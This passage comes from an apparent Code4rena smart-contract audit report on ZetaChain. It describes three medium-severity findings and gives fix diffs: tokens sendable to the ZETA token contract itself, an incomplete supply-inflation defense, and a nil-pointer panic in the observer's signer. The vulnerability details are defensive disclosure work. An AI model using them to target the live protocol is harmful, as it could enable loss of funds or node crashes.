Unfortunatelly, the second mechanism doesn’t provide such protection, which seems to warrant Medium severity.


ZETA token can be transfered to any EVM supported chain ZETA ERC20 token contract (so the ZETA ERC20 token contract itself would own those ZETA afterward), which seems to be something that should not be possible and breaking an invariant.

Proof of Concept

The following scenario would be possible with the lack of the missing protection.

  1. User owns 100 wZETA on Zetachain and wants to transfer those to Ethereum, he does that by calling ZetaConnectorZEVM::send with the following input data: destinationChainId: 1 (For Ethereum) destinationAddress: 0x5CDf9f824526Bf2A4638BF6879591F635Bb8f0B8 (Zeta.eth.sol already deployed on ETH mainnet)
  2. This would transfer the corresponding wZETA to ZetaConnectorZEVM, unwrap them to get native ZETA and send those to FUNGIBLEMODULEADDRESS. Still in the same transaction, it would emit ZetaSent event, which will be consummed by hook inside Zetacore node (in ProcessZetaSentEvent) and a CCTX will be created to get this transfered on the Ethereum chain if the CCTX is completed successfully.
  3. Now 100 wZETA (minus gas fees for the entire CCTX) ERC20 on ETH mainet would be owning by the contract itself.

I would recommend the team to put the same protection for the second mechanism, so it’s consistent and properly protected. Also validate DestinationAddress properly.

func (k Keeper) ProcessZetaSentEvent(ctx sdk.Context, event *connectorzevm.ZetaConnectorZEVMZetaSent, emittingContract ethcommon.Address, txOrigin string) error {
	if !k.zetaObserverKeeper.IsInboundEnabled(ctx) {
		return types.ErrNotEnoughPermissions


	receiverChainID := event.DestinationChainId
	receiverChain := k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(receiverChainID.Int64())
	if receiverChain == nil {
		return zetaObserverTypes.ErrSupportedChains

	// Validation if we want to send ZETA to an external chain, but there is no ZETA token.
	coreParams, found := k.zetaObserverKeeper.GetCoreParamsByChainID(ctx, receiverChain.ChainId)
	if !found {
		return types.ErrNotFoundCoreParams

+	toAddr, err := receiverChain.EncodeAddress(event.DestinationAddress)
+	if err != nil {
+		return fmt.Errorf("cannot encode address %s: %s", event.DestinationAddress, err.Error())
+	}
+       // The ZETA token itself cannot own any tokens, potential attack.
+	if strings.EqualFold(toAddr, coreParams.ZetaTokenContractAddress)) {
+		return types.ErrUnableToSendCoinType
+	}
	if receiverChain.IsExternalChain() && coreParams.ZetaTokenContractAddress == "" {
		return types.ErrUnableToSendCoinType
-	toAddr := "0x" + hex.EncodeToString(event.DestinationAddress)
	senderChain := common.ZetaChain()
	amount := math.NewUintFromBigInt(event.ZetaValueAndGas)


[25] Comprehensive Defense Against Arbitrary Minting not properly implemented as claimed by the whitepaper

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.




The whitepaper claim at section 7.3 that the protocol implement a defense mechanism to prevent ZETA token to be inflated with invalid mint, such that the total supply cannot be inflated in case of bugs being exploited.

However, such mechanism is currently only partially implemented which seems to warrant Medium severity.


Documentation claim is inaccurate and the Zeta platform cannot claim to have such Comprehensive Defense Against Arbitrary Minting mechanism in place in the moment.

Proof of Concept

I would like to describe in more details what are the current weakness of the defense mechanism.

  1. As indicated in another issue I’ve submitted titled ZetaSupplyChecker could potentially cause Observer to panic and also erroneous calculate the totalspply, ZetaSupplyChecker:

    • Can be inaccurate in his totalSupply calculation due to a bug
    • Is purelly passive in the moment as CheckZetaTokenSupply is only printing a log in case of error and ValidateZetaSupply return value (so if totalSupply is good or not) is not even consummed.
    • When the Observer starts, in case NewZetaSupplyChecker fails, the code execution will print a log and continue as is, making this feature a nice-to-have, but not mandatory (as it should be).
 zetaSupplyChecker, err := mc.NewZetaSupplyChecker(cfg, zetaBridge, masterLogger)
    if err != nil {
    if err == nil {
        defer zetaSupplyChecker.Stop()
  1. Supply check in connector contract is weak.

    • ZetaConnectorNonEth::onReceive is only checking against the totalSupply of the current external chain, not accounting for all the other supply available on other chains (which ZetaSupplyChecker try todo)
    • maxSupply is initialized with maxSupply = 2 ** 256 - 1; maximum uint256 value at contract deployment, and might not be set to a lower value later on (using setMaxSupply, and what would be this magic value?), which make this check useless if the maxSupply has not be overwritten afterwards. And I just checked on now (December 8th, 11h41 UTC-5) the Mumbai’s connector, and confirm that this is the case in the moment, maxSupply has not been overwritten yet (so still at 115792089237316195423570985008687907853269984665640564039457584007913129639935, which expose this flaw.
    function onReceive(
        bytes calldata zetaTxSenderAddress,
        uint256 sourceChainId,
        address destinationAddress,
        uint256 zetaValue,
        bytes calldata message,
        bytes32 internalSendHash
    ) external override onlyTssAddress {
        if (zetaValue + ZetaNonEthInterface(zetaToken).totalSupply() > maxSupply) revert ExceedsMaxSupply(maxSupply);
        ZetaNonEthInterface(zetaToken).mint(destinationAddress, zetaValue, internalSendHash);

        if (message.length > 0) {
                ZetaInterfaces.ZetaMessage(zetaTxSenderAddress, sourceChainId, destinationAddress, zetaValue, message)

        emit ZetaReceived(zetaTxSenderAddress, sourceChainId, destinationAddress, zetaValue, message, internalSendHash);

Remove such claim from the WhitePaper or complete the mechanism such that it work as described. If you want to complete it, I would suggest the following steps:

  1. Fix the 3 weaknesses I described for ZetaSupplyChecker.
  2. Fix the 2 weaknesses I described for ZetaConnectorNonEth.sol. I would remove the maxSupply logic from the connector contract as a whole, right now it doesn’t bring any value, and put all this inside the Observer code logic, such that before calling onReceive (SignOutboundTx) or onRevert (SignRevertTx), you add a check that communicate with ZetaSupplyChecker to see if this new supply can be minted, as this is the only place where you have the full picture of the totalsupply.

[26] Possible nil pointer dereference in multiple locations when calling crypto.SigToPub can cause panic

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.





Observers sign and send outbounds txs using TryProcessOutTx func as part of the Zeta protocol. As indicated in the lines above, there are 4 instances that do such task in an unsafe way, which can lead the program to panic.

	pubk, err := crypto.SigToPub(hashBytes, sig[:])
	if err != nil {
		signer.logger.Error().Err(err).Msgf("SigToPub error")
                //@audit : In case of error, pubk will always be nil, which will cause a panic on the next line
                // as trying to dereference a nil pointer
	addr := crypto.PubkeyToAddress(*pubk)
        signer.logger.Info().Msgf("Sign: Ecrecovery of signature: %s", addr.Hex())


zetaclientd will panic if such error scenario occurs, which will require a manual restart.

Proof of Concept

This is so self-explanatory that I don’t see how a PoC will give any values.

Granted that this scenario should be very rare as the input parameters of crypto.SigToPub have been created in the same function locally (not directly coming from an external party). Nevertheless, I feel this warrant a Medium severity as it would make the program to crash and there is no recovery in the moment implemented for this code path.

Since addr is only used to print a log, and since this should happen very rarely, I would recommend to make this trace optional as following:

	if err != nil {
		signer.logger.Error().Err(err).Msgf("SigToPub error")
-	}
+	} else {
+		addr := crypto.PubkeyToAddress(*pubk)
+		signer.logger.Info().Msgf("Sign: Ecrecovery of signature: %s", addr.Hex())
+	}

Additionally, as pointed in your previous audit and as you fixed in btc_signer.go, I would recommend to add a panic recovery also in evm_signer.go as follow. This is perfect pattern as TryProcessOutTx run in it’s own go routine, and a bad handling should not crash the observer, which would happen unfortunatelly in the moment.

func (signer *EVMSigner) TryProcessOutTx(
	send *types.CrossChainTx,
	outTxMan *OutTxProcessorManager,
	outTxID string,
	evmClient ChainClient,
	zetaBridge ZetaCoreBridger,
	height uint64,
) {
	logger := signer.logger.With().
		Str("outTxID", outTxID).
		Str("SendHash", send.Index).
	logger.Info().Msgf("start processing outTxID %s", outTxID)
	logger.Info().Msgf("EVM Chain TryProcessOutTx: %s, value %d to %s", send.Index, send.GetCurrentOutTxParam().Amount.BigInt(), send.GetCurrentOutTxParam().Receiver)

	defer func() {
+		if err := recover(); err != nil {
+			signer.logger.Error().Msgf("EVM TryProcessOutTx: %s, caught panic error: %v", send.Index, err)
+		}

lumtis (ZetaChain) confirmed

0xean (Judge) commented:

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C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.

C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.